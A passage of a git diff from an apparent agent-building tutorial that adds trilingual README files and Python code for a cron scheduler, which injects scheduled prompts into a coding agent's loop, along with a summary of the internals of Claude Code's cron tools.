"[Scheduled] run date" + → LLM receives the message, executes the date command + +4. Process shuts down: + Scheduler thread stops too (daemon=True) + .scheduled_tasks.json remains on disk + Next startup → load_durable_jobs → tasks restored +``` + +--- + +## Changes from s13 + +| Component | Before (s13) | After (s14) | +|-----------|-------------|-------------| +| Trigger mechanism | User triggers manually | Standalone scheduler thread triggers automatically | +| New type | — | CronJob dataclass (id, cron, prompt, recurring, durable) | +| New functions | — | cron_matches, schedule_job, cancel_job, cron_scheduler_loop | +| New storage | — | .scheduled_tasks.json (durable) + memory (session-only) | +| Threads | Background execution thread | + Scheduler thread (daemon, 1s polling) | +| Queues | background_results | + cron_queue (scheduler thread writes, agent_loop reads) | +| Tools | 7 (s12/s13) | + schedule_cron, list_crons, cancel_cron (10) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s14_cron_scheduler/code.py +``` + +Try these prompts: + +1. `Schedule a task to print the current date every 2 minutes` +2. `List all cron jobs` +3. `Create a one-shot reminder in 1 minute to check the build status` +4. `Cancel the recurring job and verify with list_crons` + +What to observe: Is the scheduler thread running independently? Do cron tasks fire at the correct times? Does the Agent receive injected messages after firing? Are durable jobs written to `.scheduled_tasks.json`? + +--- + +## What's Next + +A single Agent can do a lot now — it can plan, compact context, run tasks in the background, and fire on a schedule. But some tasks are too big for one Agent to handle alone. + +"Refactor the entire backend" — overhaul the auth module, database layer, API routes, and tests all at once. One Agent's attention is limited. This needs a team. + +s15 Agent Teams → One Agent isn't enough. Form a team. Persistent teammates + async inboxes. + +
+Deep Dive into CC Source + +> The following is a complete analysis based on CC source code `CronCreateTool.ts`, `cronScheduler.ts`, `cron.ts`, `cronTasks.ts`, `cronTasksLock.ts`, and `useScheduledTasks.ts` (139 lines). + +### 1. Three Cron Tools + +CC exposes three cron tools to the model: `CronCreate`, `CronDelete`, and `CronList`. All are gated by the compile-time feature flag `feature('AGENT_TRIGGERS')` and the runtime GrowthBook flag `tengu_kairos_cron`. There is also a `CLAUDE_CODE_DISABLE_CRON` environment variable for local overrides. + +### 2. Storage: `.claude/scheduled_tasks.json` + +```json +{ "tasks": [{ "id": "abc12345", "cron": "0 9 * * *", "prompt": "...", "recurring": true, "durable": true, "createdAt": 1714567890000 }] } +``` + +Durable tasks are written to disk; session-only tasks live in a `STATE.sessionCronTasks` in-memory array (lost on process restart). A `.scheduled_tasks.lock` file prevents multiple sessions of the same project from triggering duplicate tasks. + +### 3. Scheduler: 1-Second Polling + +`cronScheduler.ts` checks every second (`CHECK_INTERVAL_MS = 1000`). Whoever holds the lock triggers file-based tasks; all sessions trigger session-only tasks. A `chokidar` file watcher also monitors `scheduled_tasks.json` for changes. + +### 4. Cron Expressions: Standard 5-Field + +Minute Hour Day Month Day-of-week. Supports `*`, `*/N`, `N`, `N-M`, `N-M/S`, `N,M,...`. Does not support `L`, `W`, or `?`. All times are interpreted in the local timezone. When both day-of-month and day-of-week are constrained, OR semantics apply. + +### 5. Jitter (Thundering Herd Prevention) + +- **Recurring tasks**: Trigger delay up to 10% of the period (capped at 15 minutes), based on a deterministic hash of the task ID +- **One-shot tasks**: When the trigger time falls on `:00` or `:30`, fires up to 90 seconds early +- Jitter configuration is adjustable in real-time via GrowthBook, refreshed every 60 seconds + +### 6. Auto-Expiration + +Recurring tasks auto-expire after 7 days (configurable, max 30 days). One final trigger fires at expiration, after which the task is automatically deleted. + +### 7. Job Limit + +`MAX_JOBS = 50` (`CronCreateTool.ts:25`). When exceeded, returns error: "Too many scheduled jobs (max 50). Cancel one first." + +### 8. Trigger Injection + +After triggering, the job is enqueued via `enqueuePendingNotification()` with `priority: 'later'` into the command queue. It is tagged with `workload: WORKLOAD_CRON` — the API serves cron-initiated requests at a lower QoS when capacity is constrained. + +
+ + diff --git a/s14_cron_scheduler/README.ja.md b/s14_cron_scheduler/README.ja.md new file mode 100644 index 000000000..8d5f2b448 --- /dev/null +++ b/s14_cron_scheduler/README.ja.md @@ -0,0 +1,263 @@ +# s14: Cron Scheduler — 時間で発火、人の押しが不要 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s12 → s13 → `s14` → [s15](../s15_agent_teams/) → s16 → ... → s19 +> *"時間で発火、人の押しが不要"* — cron スケジューリング、永続またはセッションレベル。 +> +> **Harness 層**: スケジューリング — Agent が自らのタイムテーブルで行動。 + +--- + +## 課題 + +目覚まし時計は、あなたが見つめていないと鳴らないわけではない。7:00 にセットすれば、その時刻になれば勝手に鳴る — 寝ていても、シャワー中でも、料理中でも関係ない。 + +s13 で Agent はバックグラウンドで時間のかかる操作を実行できるようになった。しかし、すべての操作は依然として手動でトリガーされている。ユーザーが一言言えば、Agent が一つ動く。「毎日朝 9 時にテストを実行」「30 分ごとに CI ステータスを確認」— こうした周期タスクは、毎回人が押すべきではない。 + +--- + +## 解決策 + +![Cron Scheduler Overview](images/cron-scheduler-overview.ja.svg) + +s13 のバックグラウンドスレッド、タスクシステム、prompt 組み立てはすべてそのまま残す。新たに追加:**独立した cron スケジューリングスレッド** — daemon スレッドで動き、毎秒チェック、時間が来たらタスクを `cron_queue` に放り込む。Agent のメインループはキューからトリガーされたタスクを消費し、会話に注入する。 + +手動 vs 定時: + +| | 手動トリガー (s13) | 定時トリガー (s14) | +|---|---|---| +| トリガー主体 | ユーザー入力 | スケジューリングスレッドが自動 | +| トリガーのタイミング | いつでも | cron 式で指定 | +| 人の介入が必要 | はい | いいえ | +| 永続性 | — | durable で再起動を跨ぐ | + +--- + +## 仕組み + +### CronJob: データ構造 + +各 cron タスクは `CronJob` オブジェクト: + +```python +@dataclass +class CronJob: + id: str + cron: str # "0 9 * * *" (5 フィールド cron 式) + prompt: str # トリガー時に Agent に注入されるメッセージ + recurring: bool # True=周期的, False=一回限り + durable: bool # True=ディスクに書き込み、セッションを跨いで保持 +``` + +cron 式 — 5 フィールド、Unix で 50 年使われている: + +``` +分 時 日 月 曜日 + * * * * * 毎分 + 0 9 * * * 毎日 9:00 +*/5 * * * * 5 分ごと + 0 9 * * 1-5 平日 9:00 +``` + +`*`、`*/N`、`N`、`N-M`、`N,M,...` に対応。 + +### cron_matches: 5 フィールドマッチング + +毎回のポーリングで、現在時刻を各 job の cron 式と比較: + +```python +def _cron_field_matches(field: str, value: int) -> bool: + if field == "*": + return True + if field.startswith("*/"): + step = int(field[2:]) + return step > 0 and value % step == 0 + if "," in field: + return any(_cron_field_matches(f.strip(), value) + for f in field.split(",")) + if "-" in field: + lo, hi = field.split("-", 1) + return int(lo) <= value <= int(hi) + return value == int(field) + +def cron_matches(cron_expr: str, dt: datetime) -> bool: + fields = cron_expr.strip().split() + if len(fields) != 5: + return False + minute, hour, dom, month, dow = fields + dow_val = (dt.weekday() + 1) % 7 # Python Monday=0 → cron Sunday=0 + return all([ + _cron_field_matches(minute, dt.minute), + _cron_field_matches(hour, dt.hour), + _cron_field_matches(dom, dt.day), + _cron_field_matches(month, dt.month), + _cron_field_matches(dow, dow_val), + ]) +``` + +フィールドごとにマッチング、5 つすべて通過すればマッチ成立。 + +### 独立スケジューリングスレッド: 毎秒ポーリング + +**これが前の README との最大の違い**:スケジューラは独立した daemon スレッドで動き、agent_loop が実行中かどうかに依存しない: + +```python +def cron_scheduler_loop(): + """Independent daemon thread: poll every 1s, fire matching jobs.""" + while True: + time.sleep(1) + now = datetime.now() + minute_marker = now.hour * 60 + now.minute + with cron_lock: + for job in list(scheduled_jobs.values()): + if cron_matches(job.cron, now): + if _last_fired.get(job.id) != minute_marker: + cron_queue.append(job) + _last_fired[job.id] = minute_marker + if not job.recurring: + scheduled_jobs.pop(job.id, None) + if job.durable: + save_durable_jobs() + +threading.Thread(target=cron_scheduler_loop, daemon=True).start() +``` + +重要な設計: +- **agent_loop から独立**:ユーザーが入力していなくても、スケジューラはバックグラウンドで動き続ける +- **minute_marker で重複防止**:同じ分内では一度しかトリガーしない(1 秒ポーリング × 60 回 = 60 回チェックだが、cron の粒度は分) +- **一回限りタスク**:トリガー後、自動的に scheduled_jobs から削除 + +### agent_loop: 消費側 + +agent_loop は時間をチェックしない — `cron_queue` からトリガーされたタスクを取り出し、messages に注入するだけ: + +```python +# 各 LLM 呼び出しの前に、トリガーされた cron タスクを消費 +fired = consume_cron_queue() +for job in fired: + messages.append({"role": "user", + "content": f"[Scheduled] {job.prompt}"}) +``` + +生産者(スケジューリングスレッド)と消費者(agent_loop)は `cron_queue` + `cron_lock` で疎結合 — s13 で学んだ threading パターンをそのまま応用。 + +### Durable vs Session-only + +- **Durable**:タスク定義を `.scheduled_tasks.json` に書き込む。Agent 再起動後にファイルを読み込み、タスクを復元。 +- **Session-only**:メモリ内のみ。Agent を閉じると消える。 + +Agent 自身が判断できる — 「この定期タスクは今日だけ必要」→ session-only、「毎朝テストを実行」→ durable。 + +> **重要な前提**:cron スケジューラは OS レベルの crontab とは異なる。**Agent プロセス内で動かなければならない** — プロセスが終了すればスケジューリングも止まる。Durable はタスク定義が再起動を跨いで保持されるという意味に過ぎない — 次回 Agent 起動時に、スケジューラが「トリガーすべき時刻が過ぎている」と判断してトリガーする。もし「アプリケーションが停止していても定期的に実行」したいなら、システム crontab または systemd timer を使用してください。 + +### 全体の動き + +``` +1. 起動時: + load_durable_jobs() → .scheduled_tasks.json から durable タスクを復元 + Thread(cron_scheduler_loop, daemon=True).start() → スケジューリングスレッドがポーリング開始 + +2. タスク登録: + schedule_cron(cron="*/2 * * * *", prompt="run date", durable=True) + → CronJob を scheduled_jobs + .scheduled_tasks.json に書き込み + +3. 2 分ごと: + スケジューリングスレッドがチェック → cron_matches が True を返す → cron_queue.append(job) + → agent_loop の次のサイクルで consume_cron_queue → "[Scheduled] run date" を注入 + → LLM がメッセージを受信し、date コマンドを実行 + +4. プロセス終了: + スケジューリングスレッドも一緒に停止(daemon=True) + .scheduled_tasks.json はディスクに残る + 次回起動 → load_durable_jobs → タスクが復元 +``` + +--- + +## s13 からの変更点 + +| コンポーネント | 変更前 (s13) | 変更後 (s14) | +|------|-----------|-----------| +| トリガー方式 | ユーザーが手動トリガー | 独立スケジューリングスレッドが自動トリガー | +| 新しい型 | — | CronJob dataclass (id, cron, prompt, recurring, durable) | +| 新しい関数 | — | cron_matches, schedule_job, cancel_job, cron_scheduler_loop | +| 新しいストレージ | — | .scheduled_tasks.json (durable) + メモリ (session-only) | +| スレッド | バックグラウンド実行スレッド | + スケジューリングスレッド (daemon, 1 秒ポーリング) | +| キュー | background_results | + cron_queue (スケジューリングスレッドが書き込み, agent_loop が読み取り) | +| ツール | 7 (s12/s13) | + schedule_cron, list_crons, cancel_cron (10) | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s14_cron_scheduler/code.py +``` + +以下のプロンプトを試してみよう: + +1. `Schedule a task to print the current date every 2 minutes` +2. `List all cron jobs` +3. `Create a one-shot reminder in 1 minute to check the build status` +4. `Cancel the recurring job and verify with list_crons` + +観察のポイント:スケジューリングスレッドが独立して動いているか? cron タスクが正しい時刻にトリガーされているか? トリガー後、Agent に注入されたメッセージが届いているか? durable job が `.scheduled_tasks.json` に書き込まれているか? + +--- + +## 次のステップ + +一つの Agent でもできることが増えた — 計画、圧縮、バックグラウンド、定時実行。しかし中には、一つの Agent では対応しきれないほど大きなタスクがある。 + +「バックエンド全体をリファクタリング」— 認証モジュール、データベース層、API ルート、テストをすべて刷新する。一つの Agent の注意力には限界がある、これはチームでやるべき仕事だ。 + +s15 Agent Teams → 一つの Agent で足りないなら、チームを組もう。永続的なチームメイト + 非同期メールボックス。 + +
+CC ソースコード深掘り + +> 以下は CC ソースコード `CronCreateTool.ts`、`cronScheduler.ts`、`cron.ts`、`cronTasks.ts`、`cronTasksLock.ts`、`useScheduledTasks.ts`(139 行)の完全分析に基づく。 + +### 一、3 つの Cron ツール + +CC はモデルに 3 つの cron ツールを公開している:`CronCreate`、`CronDelete`、`CronList`。すべてコンパイル時ゲート `feature('AGENT_TRIGGERS')` とランタイム GrowthBook フラグ `tengu_kairos_cron` で制御されている。さらに `CLAUDE_CODE_DISABLE_CRON` 環境変数によるローカル上書きも可能。 + +### 二、ストレージ:`.claude/scheduled_tasks.json` + +```json +{ "tasks": [{ "id": "abc12345", "cron": "0 9 * * *", "prompt": "...", "recurring": true, "durable": true, "createdAt": 1714567890000 }] } +``` + +Durable タスクはディスクに書き込まれる。session-only タスクは `STATE.sessionCronTasks` のメモリ配列に格納(プロセス再起動で消失)。さらに `.scheduled_tasks.lock` ファイルで、同じプロジェクトの複数セッションによる重複トリガーを防止。 + +### 三、スケジューラ:1 秒ポーリング + +`cronScheduler.ts` は毎秒チェック(`CHECK_INTERVAL_MS = 1000`)。ロックを保持しているセッションがファイルタスクをトリガー。すべてのセッションは session-only タスクをトリガー。さらに `chokidar` ファイルウォッチャーが `scheduled_tasks.json` の変更を監視。 + +### 四、cron 式:標準 5 フィールド + +分 時 日 月 曜日。`*`、`*/N`、`N`、`N-M`、`N-M/S`、`N,M,...` に対応。`L`、`W`、`?` は非対応。すべての時間はローカルタイムゾーンで解釈。day-of-month と day-of-week が同時に指定された場合、OR セマンティクスで評価。 + +### 五、ジッター(雷鳴効果防止) + +- **繰り返しタスク**:トリガー遅延は最大で期間の 10%(上限 15 分)、タスク ID の決定論的ハッシュに基づく +- **一回限りタスク**:トリガー時刻が `:00` または `:30` に該当する場合、最大 90 秒前にトリガー +- ジッター設定は GrowthBook でリアルタイム調整可能、60 秒ごとに更新 + +### 六、自動期限切れ + +繰り返しタスクは 7 日後に自動期限切れ(設定可能、上限 30 日)。期限切れの最後のトリガーを実行後、自動削除。 + +### 七、ジョブ数上限 + +`MAX_JOBS = 50`(`CronCreateTool.ts:25`)。上限を超えるとエラーを返す:"Too many scheduled jobs (max 50). Cancel one first." + +### 八、トリガー注入 + +トリガー後、`enqueuePendingNotification()` で `priority: 'later'` としてコマンドキューに入る。`workload: WORKLOAD_CRON` のマークが付く — API は容量が逼迫しているとき、cron 発のリクエストにより低い QoS で対応する。 + +
+ + diff --git a/s14_cron_scheduler/README.md b/s14_cron_scheduler/README.md new file mode 100644 index 000000000..6adfaf7ee --- /dev/null +++ b/s14_cron_scheduler/README.md @@ -0,0 +1,263 @@ +# s14: Cron Scheduler — 定时触发,不需要人推 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s12 → s13 → `s14` → [s15](../s15_agent_teams/) → s16 → ... → s19 +> *"定时触发, 不需要人推"* — cron 调度, 持久化或会话级。 +> +> **Harness 层**: 调度 — Agent 自己按时间表做事。 + +--- + +## 问题 + +闹钟不需要你盯着它才会响。你设好 7:00,到点它自己响——你在睡觉、在洗澡、在做饭,它都照响不误。 + +s13 让 Agent 能后台执行慢操作——但所有操作仍然是你手动触发的。你说一句,Agent 动一下。"每天早上 9 点跑测试"、"每 30 分钟检查 CI 状态"——这些周期性任务不该需要人每次来推。 + +--- + +## 解决方案 + +![Cron Scheduler Overview](images/cron-scheduler-overview.svg) + +s13 的后台线程、任务系统、prompt 组装全部保留。新增:**独立的 cron 调度线程**——跑在 daemon 线程里,每秒检查一次,时间到了把任务塞进 `cron_queue`。Agent 的主循环从队列里消费触发的任务,注入到对话里。 + +手动 vs 定时: + +| | 手动触发 (s13) | 定时触发 (s14) | +|---|---|---| +| 触发者 | 用户输入 | 调度线程自动 | +| 触发时机 | 随时 | cron 表达式指定 | +| 需要人参与 | 是 | 否 | +| 持久性 | — | durable 跨重启 | + +--- + +## 工作原理 + +### CronJob: 数据结构 + +每个 cron 任务是一个 `CronJob` 对象: + +```python +@dataclass +class CronJob: + id: str + cron: str # "0 9 * * *" (五段式 cron 表达式) + prompt: str # 触发时注入给 Agent 的消息 + recurring: bool # True=周期性,False=一次性 + durable: bool # True=写磁盘,跨会话保留 +``` + +Cron 表达式——五段式,Unix 用了 50 年: + +``` +分钟 小时 日 月 星期 + * * * * * 每分钟 + 0 9 * * * 每天早上 9:00 + */5 * * * * 每 5 分钟 + 0 9 * * 1-5 工作日早上 9:00 +``` + +支持 `*`、`*/N`、`N`、`N-M`、`N,M,...`。 + +### cron_matches: 五段式匹配 + +每次轮询,把当前时间跟每个 job 的 cron 表达式比较: + +```python +def _cron_field_matches(field: str, value: int) -> bool: + if field == "*": + return True + if field.startswith("*/"): + step = int(field[2:]) + return step > 0 and value % step == 0 + if "," in field: + return any(_cron_field_matches(f.strip(), value) + for f in field.split(",")) + if "-" in field: + lo, hi = field.split("-", 1) + return int(lo) <= value <= int(hi) + return value == int(field) + +def cron_matches(cron_expr: str, dt: datetime) -> bool: + fields = cron_expr.strip().split() + if len(fields) != 5: + return False + minute, hour, dom, month, dow = fields + dow_val = (dt.weekday() + 1) % 7 # Python Monday=0 → cron Sunday=0 + return all([ + _cron_field_matches(minute, dt.minute), + _cron_field_matches(hour, dt.hour), + _cron_field_matches(dom, dt.day), + _cron_field_matches(month, dt.month), + _cron_field_matches(dow, dow_val), + ]) +``` + +逐字段匹配,5 个字段全部通过才算匹配。 + +### 独立调度线程: 每秒轮询 + +**这是跟之前 README 最大的区别**:调度器跑在独立的 daemon 线程里,不依赖 agent_loop 是否在执行: + +```python +def cron_scheduler_loop(): + """Independent daemon thread: poll every 1s, fire matching jobs.""" + while True: + time.sleep(1) + now = datetime.now() + minute_marker = now.hour * 60 + now.minute + with cron_lock: + for job in list(scheduled_jobs.values()): + if cron_matches(job.cron, now): + if _last_fired.get(job.id) != minute_marker: + cron_queue.append(job) + _last_fired[job.id] = minute_marker + if not job.recurring: + scheduled_jobs.pop(job.id, None) + if job.durable: + save_durable_jobs() + +threading.Thread(target=cron_scheduler_loop, daemon=True).start() +``` + +关键设计: +- **独立于 agent_loop**:即使用户没在输入,调度器也在后台跑 +- **minute_marker 防重复**:同一分钟内只触发一次(1 秒轮询 × 60 次 = 60 次检查,但 cron 粒度是分钟) +- **一次性任务**:触发后自动从 scheduled_jobs 里删除 + +### agent_loop: 消费端 + +agent_loop 不负责检查时间——它只从 `cron_queue` 里拿触发的任务,注入到 messages 里: + +```python +# 每轮 LLM 调用前,消费已触发的 cron 任务 +fired = consume_cron_queue() +for job in fired: + messages.append({"role": "user", + "content": f"[Scheduled] {job.prompt}"}) +``` + +生产者(调度线程)和消费者(agent_loop)通过 `cron_queue` + `cron_lock` 解耦——s13 教的 threading 模式直接用上了。 + +### Durable vs Session-only + +- **Durable**:任务定义写进 `.scheduled_tasks.json`。Agent 重启后加载文件,恢复任务。 +- **Session-only**:只在内存里。Agent 关闭就没了。 + +Agent 可以自己决定——"这个定时任务只要今天有效"→ session-only,"每天早上跑测试"→ durable。 + +> **重要前提**:cron 调度器跟 OS 级 crontab 不一样。**它必须在 Agent 进程内跑**——进程关闭,调度也停。Durable 只意味着任务定义跨重启保留——下次 Agent 启动时,调度器才会发现"该触发了"并触发。如果你需要"即使应用关闭也能定时跑",请用系统 crontab 或 systemd timer。 + +### 合起来跑 + +``` +1. 启动时: + load_durable_jobs() → 从 .scheduled_tasks.json 恢复持久化任务 + Thread(cron_scheduler_loop, daemon=True).start() → 调度线程开始轮询 + +2. 注册任务: + schedule_cron(cron="*/2 * * * *", prompt="run date", durable=True) + → CronJob 写入 scheduled_jobs + .scheduled_tasks.json + +3. 每 2 分钟: + 调度线程检查 → cron_matches 返回 True → cron_queue.append(job) + → agent_loop 下次循环 consume_cron_queue → 注入 "[Scheduled] run date" + → LLM 收到消息,执行 date 命令 + +4. 关闭进程: + 调度线程跟着停(daemon=True) + .scheduled_tasks.json 还在磁盘上 + 下次启动 → load_durable_jobs → 任务恢复 +``` + +--- + +## 相对 s13 的变更 + +| 组件 | 之前 (s13) | 之后 (s14) | +|------|-----------|-----------| +| 触发方式 | 用户手动触发 | 独立调度线程自动触发 | +| 新类型 | — | CronJob dataclass (id, cron, prompt, recurring, durable) | +| 新函数 | — | cron_matches, schedule_job, cancel_job, cron_scheduler_loop | +| 新存储 | — | .scheduled_tasks.json (durable) + 内存 (session-only) | +| 线程 | 后台执行线程 | + 调度线程 (daemon, 1s 轮询) | +| 队列 | background_results | + cron_queue (调度线程写, agent_loop 读) | +| 工具 | 7 (s12/s13) | + schedule_cron, list_crons, cancel_cron (10) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s14_cron_scheduler/code.py +``` + +试试这些 prompt: + +1. `Schedule a task to print the current date every 2 minutes` +2. `List all cron jobs` +3. `Create a one-shot reminder in 1 minute to check the build status` +4. `Cancel the recurring job and verify with list_crons` + +观察重点:调度线程是否在独立运行?cron 任务是否在正确的时间点触发?触发后 Agent 是否收到注入的消息?durable job 是否写入了 `.scheduled_tasks.json`? + +--- + +## 接下来 + +一个 Agent 能做很多事了——能计划、能压缩、能后台、能定时。但有些任务太大了,不是一个 Agent 能搞定的。 + +"重构整个后端"——把认证模块、数据库层、API 路由、测试全部翻新。一个 Agent 的注意力是有限的,这需要一个团队。 + +s15 Agent Teams → 一个 Agent 不够,组队吧。持久队友 + 异步收件箱。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `CronCreateTool.ts`、`cronScheduler.ts`、`cron.ts`、`cronTasks.ts`、`cronTasksLock.ts`、`useScheduledTasks.ts`(139 行)的完整分析。 + +### 一、三个 Cron 工具 + +CC 暴露了三个 cron 工具给模型:`CronCreate`、`CronDelete`、`CronList`。全部由编译时门控 `feature('AGENT_TRIGGERS')` 和运行时 GrowthBook 标志 `tengu_kairos_cron` 控制。还有一个 `CLAUDE_CODE_DISABLE_CRON` 环境变量做本地覆盖。 + +### 二、存储:`.claude/scheduled_tasks.json` + +```json +{ "tasks": [{ "id": "abc12345", "cron": "0 9 * * *", "prompt": "...", "recurring": true, "durable": true, "createdAt": 1714567890000 }] } +``` + +Durable 任务写磁盘;session-only 任务存于 `STATE.sessionCronTasks` 内存数组(进程重启丢失)。还有一个 `.scheduled_tasks.lock` 文件防止同项目的多个 session 重复触发。 + +### 三、调度器:1 秒轮询 + +`cronScheduler.ts` 每秒检查一次(`CHECK_INTERVAL_MS = 1000`)。谁持有锁谁触发文件任务;所有 session 都触发仅 session 任务。还有一个 `chokidar` 文件观察者监视 `scheduled_tasks.json` 变更。 + +### 四、Cron 表达式:标准 5 字段 + +分钟 小时 日 月 星期。支持 `*`、`*/N`、`N`、`N-M`、`N-M/S`、`N,M,...`。不支持 `L`、`W`、`?`。所有时间以本地时区解释。Day-of-month 和 day-of-week 同时约束时用 OR 语义。 + +### 五、抖动(防惊群效应) + +- **重复性任务**:触发延迟最多可达期间的 10%(上限 15 分钟),基于任务 ID 的确定性哈希 +- **一次性任务**:当触发时间落在 `:00` 或 `:30` 时,最多提前 90 秒触发 +- 抖动配置可通过 GrowthBook 实时调整,60 秒刷新一次 + +### 六、自动过期 + +重复性任务 7 天后自动过期(可配置,上限 30 天)。过期前最后一次触发,触发后自动删除。 + +### 七、作业数上限 + +`MAX_JOBS = 50`(`CronCreateTool.ts:25`)。超限时返回错误:"Too many scheduled jobs (max 50). Cancel one first." + +### 八、触发注入 + +触发后通过 `enqueuePendingNotification()` 以 `priority: 'later'` 入队命令队列。标记 `workload: WORKLOAD_CRON`——API 在容量紧张时以更低的 QoS 为 cron 发起的请求服务。 + +
+ + diff --git a/s14_cron_scheduler/code.py b/s14_cron_scheduler/code.py new file mode 100644 index 000000000..6f5184dd3 --- /dev/null +++ b/s14_cron_scheduler/code.py @@ -0,0 +1,599 @@ +#!/usr/bin/env python3 +""" +s14: Cron Scheduler — independent daemon thread polling + cron_queue injection. + +Run: python s14_cron_scheduler/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s13: + - CronJob dataclass (id, cron, prompt, recurring, durable) + - cron_matches: 5-field cron expression matching (* */N N N-M N,M,...) + - schedule_job / cancel_job: register/remove cron jobs + - cron_scheduler_loop: independent daemon thread, polls every 1s + - cron_queue: thread-safe queue, scheduler writes, agent_loop consumes + - Durable storage: .scheduled_tasks.json (survives restart) + - 3 new tools: schedule_cron, list_crons, cancel_cron + +ASCII flow: + [daemon thread] cron_scheduler_loop (sleep 1s → check → fire → queue) + | + v + cron_queue ──→ agent_loop (consume → inject message → LLM → tools) +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict, field + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12, unchanged) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: list[str] + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Prompt Assembly (from s10, unchanged) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob, " + "create_task, list_tasks, claim_task, complete_task, " + "schedule_cron, list_crons, cancel_cron.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "cron": "Use schedule_cron for recurring or scheduled tasks.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("has_cron"): + sections.append(PROMPT_SECTIONS["cron"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (from s13, unchanged) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks. Use create_task to add some." + lines = [] + for t in tasks: + icon = {"pending": "○", "in_progress": "●", + "completed": "✓"}.get(t.status, "?") + deps = f" (blockedBy: {', '.join(t.blockedBy)})" if t.blockedBy else "" + owner = f" [{t.owner}]" if t.owner else "" + lines.append(f" {icon} {t.id}: {t.subject} " + f"[{t.status}]{owner}{deps}") + return "\n".join(lines) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +# ── Background Tasks (from s13, unchanged) ── + +background_results: dict[str, str] = {} +background_lock = threading.Lock() + + +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + slow_keywords = 